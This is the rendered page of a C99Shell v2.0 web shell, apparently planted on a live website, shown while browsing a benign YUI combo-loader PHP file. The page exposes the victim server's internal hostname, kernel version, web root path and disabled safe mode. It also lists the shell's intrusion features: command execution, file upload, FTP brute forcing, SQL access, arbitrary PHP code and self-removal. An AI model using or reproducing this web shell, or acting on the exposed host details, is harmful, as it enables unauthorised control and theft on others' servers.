!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/data/   drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     combo.php (2.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require "include/phpfunctions.php";

$cCharset "utf-8";

$queryString getQueryString();

if (!isset(
$queryString) || strlen($queryString) == 0) {
    return;
}
$yuiFiles    explode("&"$queryString);
$contentType strpos($yuiFiles[0], ".js") ? 'application/x-javascript' ' text/css';


$yuiComponents = array();

if(
$contentType=='application/x-javascript')
{
    foreach(
$yuiFiles as $yuiFile) {
        
$parts explode("/"$yuiFile);
        if(
count($parts) == 4)
        {
            if (isset(
$parts[0]) && isset($parts[1]) && isset($parts[2])) {
                
//Add module to array for loading
                
$yuiComponents[] = $parts[2]."/".$parts[2];
            } else {
            die(
'<!-- Unable to determine module name! '.runner_htmlspecialchars($yuiFile).' -->');
            }
        }
        else
        {
            
$start strpos($yuiFile"/build/");
            if(
$start === FALSE)
                die(
'<!-- Unable to determine module name! '.runner_htmlspecialchars($yuiFile).' -->');
            
$start += strlen("/build/");
            
$end strpos($yuiFile".js");
            if(
$end === FALSE)
                die(
'<!-- Unable to determine module name! '.runner_htmlspecialchars($yuiFile).' -->');
            
$yuiComponents[] = substr($yuiFile$start$end $start);
        }
    }
    
$library myfile_get_contents(getabspath("include/yui/yui.lib"), "r");
}
else
{
//    css
    
foreach($yuiFiles as $yuiFile) {
        
$start strpos($yuiFile"/build/");
        if(
$start === FALSE)
            die(
'<!-- Unable to determine module name! '.runner_htmlspecialchars($yuiFile).' -->');
        
$start += strlen("/build/");
        
$yuiComponents[] = substr($yuiFile$start);
    }
    
$library myfile_get_contents(getabspath("include/yui/yuicss.lib"), "r");
}

header("Cache-Control: max-age=315360000");
header("Expires: Thu, 29 Oct 2020 20:00:00 GMT");
header("Content-Type: " $contentType);

foreach(
$yuiComponents as $y)
{
    
$start strpos($library"begincombofile ".$y);
    if(
$start === FALSE)
    {
        die(
"Unknown file ".runner_htmlspecialchars($y));
    }
    
$start += strlen("begincombofile ".$y);
    
$end strpos($library"endcombofile"$start);
    if(
$end === FALSE)
    {
        die(
"Unknown file ".runner_htmlspecialchars($y));
    }
    echo 
substr($library$start$end $start);
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0017 ]--